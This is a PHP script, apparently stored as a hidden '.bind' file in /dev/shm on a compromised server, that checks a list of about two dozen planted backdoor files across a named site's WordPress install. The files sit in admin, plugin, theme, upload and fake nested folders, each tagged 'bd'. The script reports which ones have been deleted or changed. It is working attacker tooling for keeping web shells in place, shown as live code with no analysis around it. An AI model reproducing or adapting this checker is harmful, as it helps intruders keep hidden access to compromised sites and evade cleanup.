File: //proc/thread-self/root/dev/shm/.bind
<?php $r = '/home/sites/synapse-ms.com'; $x = ["/wp-admin/network/network/network/index.php"=>"bd@@7211200@@25",
"/wp-content/uploads/2024/09/09/cache.php"=>"bd@@8221195@@53",
"/wp-admin/export.php"=>"bd@@8222041@@9",
"/wp-admin/includes/options.php"=>"bd@@8221853@@78",
"/wp-includes/blocks/template-part/template-part/index.php"=>"bd@@7130136@@62",
"/wp-content/themes/twentytwentytwo/assets/images/galleries/rankform.php"=>"bd@@8222147@@966",
"/wp-content/plugins/akismet/_inc/fonts/fonts/cache.php"=>"bd@@8235515@@22",
"/438887/438887/438887/438887/438887/cache.php"=>"bd@@8235815@@19",
"/wp-admin/network/profile.php"=>"bd@@8222053@@74",
"/wp-admin/load-scripts.php"=>"bd@@7211009@@60",
"/images/images/images/cache.php"=>"bd@@7120410@@55",
"/438887/438887/index.php"=>"bd@@7120374@@35",
"/wp-admin/ms-edit.php"=>"bd@@7117141@@90",
"/wp-admin/edit-tag-form.php"=>"bd@@7130202@@66",
"/438887/438887/438887/438887/438887/index.php"=>"bd@@7210846@@1",
"/wp-admin/moderation.php"=>"bd@@7130232@@80",
"/xmlrpc.php"=>"bd@@7120403@@84",
"/wp-admin/options-discussion.php"=>"bd@@7120414@@97",
"/wp-mail.php"=>"bd@@7211426@@26",
"/wp-includes/blocks/quote/item.php"=>"bd@@7211447@@885",
"/wp-includes/sodium_compat/src/Core/AES/cssjs/defaultsection.php"=>"bd@@8222155@@967",
"/wp-admin/ms-themes.php"=>"bd@@7210972@@34",
"/wp-admin/about.php"=>"bd@@8221918@@85",
"/wp-admin/menu-header.php"=>"bd@@7120371@@22"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');